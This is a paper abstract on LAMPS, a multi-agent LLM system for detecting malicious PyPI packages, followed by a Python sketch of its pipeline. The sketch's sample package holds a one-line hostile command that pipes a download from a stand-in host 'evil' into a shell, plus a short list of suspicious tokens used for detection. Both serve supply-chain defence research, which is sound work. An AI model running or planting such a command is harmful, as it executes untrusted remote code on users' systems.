Malicious code in open-source repositories such as PyPI poses a growing threat to software supply chains. Traditional rule-based tools often overlook the semantic patterns in source code that are crucial for identifying adversarial components. Large language models (LLMs) show promise for software analysis, yet their use in interpretable and modular security pipelines remains limited. This paper presents LAMPS, a multi-agent system that employs collaborative LLMs to detect malicious PyPI packages. The system consists of four role-specific agents for package retrieval, file extraction, classification, and verdict aggregation, coordinated through the CrewAI framework. A prototype combines a fine-tuned CodeBERT model for classification with LLaMA-3 agents for contextual reasoning. LAMPS has been evaluated on two complementary datasets: D1, a balanced collection of 6,000 setup.py files, and D2, a realistic multi-file dataset with 1,296 files and natural class imbalance. On D1, LAMPS achieves 97.7% accuracy, surpassing MPHunter, a state-of-the-art approach. On D2, it reaches 99.5% accuracy and 99.5% balanced accuracy, outperforming RAG-based approaches and fine-tuned single-agent baselines. McNemar's test confirms these improvements as highly significant. The results demonstrate the feasibility of distributed LLM reasoning for malicious code detection and highlight the benefits of modular multi-agent designs in software supply chain security.
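The four-stage pipeline described above can be sketched as a plain-Python illustration. This is a hypothetical stand-in, not the actual LAMPS implementation: the real system coordinates LLM agents through CrewAI and classifies files with a fine-tuned CodeBERT model, whereas here each role is a stub function and the classifier is a trivial token heuristic chosen only to show the data flow between agents.

```python
# Hypothetical sketch of the LAMPS four-agent data flow: retrieval ->
# extraction -> per-file classification -> verdict aggregation.
# All function names, the sample package contents, and the token
# heuristic are illustrative assumptions, not the paper's method.

def retrieve_package(name):
    # Retrieval agent stub: would download the sdist from PyPI.
    return {
        "name": name,
        "files": {
            "setup.py": "import os; os.system('curl http://evil/x | sh')",
            "pkg/__init__.py": "VERSION = '1.0'",
        },
    }

def extract_files(package):
    # Extraction agent: keep only Python sources worth scanning.
    return {p: src for p, src in package["files"].items() if p.endswith(".py")}

def classify_file(source):
    # Classification agent stub; the prototype uses fine-tuned CodeBERT here.
    suspicious = ("os.system", "eval(", "base64.b64decode")
    score = sum(tok in source for tok in suspicious) / len(suspicious)
    return {"malicious": score > 0, "score": score}

def aggregate(verdicts):
    # Aggregation agent: flag the package if any file is malicious.
    flagged = sorted(p for p, v in verdicts.items() if v["malicious"])
    return {"malicious": bool(flagged), "flagged_files": flagged}

def scan(name):
    pkg = retrieve_package(name)
    files = extract_files(pkg)
    verdicts = {p: classify_file(src) for p, src in files.items()}
    return aggregate(verdicts)
```

Keeping each role behind its own function boundary mirrors the modularity the paper argues for: the stub classifier can be swapped for a CodeBERT model, and the aggregation rule for an LLM-mediated verdict, without touching the other stages.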